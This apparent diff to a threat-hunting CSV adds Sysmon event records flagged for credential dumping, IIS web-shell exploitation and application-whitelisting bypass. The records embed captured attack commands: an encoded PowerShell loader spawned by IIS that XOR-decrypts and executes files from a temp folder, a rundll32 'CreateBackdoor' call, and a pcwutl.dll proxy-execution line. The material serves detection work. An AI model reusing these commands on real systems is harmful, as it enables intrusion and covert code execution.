+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot;  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
+    <Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
+    <Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
+    <Data Name=""LogonId"">0x82423</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-3251-5CEB-0000-00109E06E100</Data>
+    <Data Name=""ParentProcessId"">748</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\inetsrv\w3wp.exe</Data>
+    <Data Name=""ParentCommandLine"">c:\windows\system32\inetsrv\w3wp.exe -ap &quot;DefaultAppPool&quot; -v &quot;v2.0&quot; -l &quot;webengine4.dll&quot; -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h &quot;C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config&quot; -w &quot;&quot; -m 0 -t 20</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[  T1003 ] Credential Dumping ImageLoad,1555606693.74034,2019-04-18T20:58:13.740340+04:00,,Threat,Medium,[  T1003 ] Credential Dumping ImageLoad,7,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>7</EventID>
+    <Version>3</Version>
+    <Level>4</Level>
+    <Task>7</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-18T16:58:13.650211Z"">
+    </TimeCreated>
+    <EventRecordID>20</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3192"" ThreadID=""164"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName"">technique_id=T1003,technique_name=Credential Dumping</Data>
+    <Data Name=""UtcTime"">2019-04-18 16:58:13.560</Data>
+    <Data Name=""ProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
+    <Data Name=""ProcessId"">1200</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ImageLoaded"">C:\Windows\System32\hid.dll</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Hid User Library</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""Hashes"">SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE</Data>
+    <Data Name=""Signed"">true</Data>
+    <Data Name=""Signature"">Microsoft Windows</Data>
+    <Data Name=""SignatureStatus"">Valid</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+Detect IIS/Exchange Exploitation,1558920522.711005,2019-05-27T05:28:42.711005+04:00,,Threat,Critical,IIS run command with user (IIS APPPOOL\DefaultAppPool) and process name (C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe) and commandline ( &quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot;  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA== ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-27T01:28:42.711005Z"">
+    </TimeCreated>
+    <EventRecordID>5875</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""324"" ThreadID=""2260"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-27 01:28:42.700</Data>
+    <Data Name=""ProcessGuid"">365ABB72-3D4A-5CEB-0000-0010FA93FD00</Data>
+    <Data Name=""ProcessId"">2584</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows PowerShell</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe&quot;  -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\Temp\</Data>
+    <Data Name=""User"">IIS APPPOOL\DefaultAppPool</Data>
+    <Data Name=""LogonGuid"">365ABB72-B26B-5CEA-0000-002023240800</Data>
+    <Data Name=""LogonId"">0x82423</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">High</Data>
+    <Data Name=""Hashes"">SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-3251-5CEB-0000-00109E06E100</Data>
+    <Data Name=""ParentProcessId"">748</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\inetsrv\w3wp.exe</Data>
+    <Data Name=""ParentCommandLine"">c:\windows\system32\inetsrv\w3wp.exe -ap &quot;DefaultAppPool&quot; -v &quot;v2.0&quot; -l &quot;webengine4.dll&quot; -a \\.\pipe\iisipm7486e07c-453c-4f8e-85c6-8c8e3be98cd5 -h &quot;C:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config&quot; -w &quot;&quot; -m 0 -t 20</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1584766825.242652,2020-03-21T09:00:25.242652+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2020-03-21T05:00:25.234543Z"">
+    </TimeCreated>
+    <EventRecordID>243544</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2860"" ThreadID=""3508"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>MSEDGEWIN10</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2020-03-21 05:00:25.077</Data>
+    <Data Name=""ProcessGuid"">747F3D96-9F69-5E75-0000-0010476F2000</Data>
+    <Data Name=""ProcessId"">7836</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""OriginalFileName"">RUNDLL32.EXE</Data>
+    <Data Name=""CommandLine"">rundll32 windowscoredeviceinfo.dll,CreateBackdoor</Data>
+    <Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
+    <Data Name=""User"">NT AUTHORITY\SYSTEM</Data>
+    <Data Name=""LogonGuid"">747F3D96-9DBA-5E75-0000-0020E7030000</Data>
+    <Data Name=""LogonId"">0x3e7</Data>
+    <Data Name=""TerminalSessionId"">0</Data>
+    <Data Name=""IntegrityLevel"">System</Data>
+    <Data Name=""Hashes"">SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A</Data>
+    <Data Name=""ParentProcessGuid"">747F3D96-9DBC-5E75-0000-00102C390100</Data>
+    <Data Name=""ParentProcessId"">1652</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\svchost.exe</Data>
+    <Data Name=""ParentCommandLine"">C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv</Data>
+  </EventData>
+</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( &quot;C:\Windows\System32\rundll32.exe&quot;  pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe)",1,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>1</EventID>
+    <Version>5</Version>
+    <Level>4</Level>
+    <Task>1</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-05-12T17:09:02.275164Z"">
+    </TimeCreated>
+    <EventRecordID>16507</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""2012"" ThreadID=""300"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName""></Data>
+    <Data Name=""UtcTime"">2019-05-12 17:09:02.275</Data>
+    <Data Name=""ProcessGuid"">365ABB72-532E-5CD8-0000-00106C222700</Data>
+    <Data Name=""ProcessId"">1528</Data>
+    <Data Name=""Image"">C:\Windows\System32\rundll32.exe</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Windows host process (Rundll32)</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""CommandLine"">&quot;C:\Windows\System32\rundll32.exe&quot;  pcwutl.dll,LaunchApplication c:\Windows\system32\calc.exe</Data>
+    <Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
+    <Data Name=""User"">IEWIN7\IEUser</Data>
+    <Data Name=""LogonGuid"">365ABB72-4FB5-5CD8-0000-0020F2350100</Data>
+    <Data Name=""LogonId"">0x135f2</Data>
+    <Data Name=""TerminalSessionId"">1</Data>
+    <Data Name=""IntegrityLevel"">Medium</Data>
+    <Data Name=""Hashes"">SHA1=892503B20247B341CFD20DDA5FDACFA41527A087,MD5=C648901695E275C8F2AD04B687A68CE2,SHA256=3FA4912EB43FC304652D7B01F118589259861E2D628FA7C86193E54D5F987670,IMPHASH=239D911DFA7551A8B735680BC39B2238</Data>
+    <Data Name=""ParentProcessGuid"">365ABB72-516B-5CD8-0000-001087E41600</Data>
+    <Data Name=""ParentProcessId"">3788</Data>
+    <Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
+    <Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,1555606693.74034,2019-04-18T20:58:13.740340+04:00,,Threat,High,[T1003] Processes opening handles and accessing Lsass with potential dlls in memory,7,"<?xml version=""1.0"" encoding=""utf-8""?>
+<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
+  <System>
+    <Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
+    </Provider>
+    <EventID>7</EventID>
+    <Version>3</Version>
+    <Level>4</Level>
+    <Task>7</Task>
+    <Opcode>0</Opcode>
+    <Keywords>0x8000000000000000</Keywords>
+    <TimeCreated SystemTime=""2019-04-18T16:58:13.650211Z"">
+    </TimeCreated>
+    <EventRecordID>20</EventRecordID>
+    <Correlation>
+    </Correlation>
+    <Execution ProcessID=""3192"" ThreadID=""164"">
+    </Execution>
+    <Channel>Microsoft-Windows-Sysmon/Operational</Channel>
+    <Computer>IEWIN7</Computer>
+    <Security UserID=""S-1-5-18"">
+    </Security>
+  </System>
+  <EventData>
+    <Data Name=""RuleName"">technique_id=T1003,technique_name=Credential Dumping</Data>
+    <Data Name=""UtcTime"">2019-04-18 16:58:13.560</Data>
+    <Data Name=""ProcessGuid"">365ABB72-AC28-5CB8-0000-0010F3F70700</Data>
+    <Data Name=""ProcessId"">1200</Data>
+    <Data Name=""Image"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
+    <Data Name=""ImageLoaded"">C:\Windows\System32\hid.dll</Data>
+    <Data Name=""FileVersion"">6.1.7600.16385 (win7_rtm.090713-1255)</Data>
+    <Data Name=""Description"">Hid User Library</Data>
+    <Data Name=""Product"">Microsoft® Windows® Operating System</Data>
+    <Data Name=""Company"">Microsoft Corporation</Data>
+    <Data Name=""Hashes"">SHA1=1BC4F63F2111059372F02E0B3893A38589B38688,MD5=63DF770DF74ACB370EF5A16727069AAF,SHA256=B8F96336BF87F1153C245D19606CBD10FBE7CF2795BCC762F2A1B57CB7C39116,IMPHASH=480C71617B8C5E2173781DA9C5B742AE</Data>
+    <Data Name=""Signed"">true</Data>
+    <Data Name=""Signature"">Microsoft Windows</Data>
+    <Data Name=""SignatureStatus"">Valid</Data>
+  </EventData>
+</Event>",IEWIN7,Microsoft-Windows-Sysmon/Operational
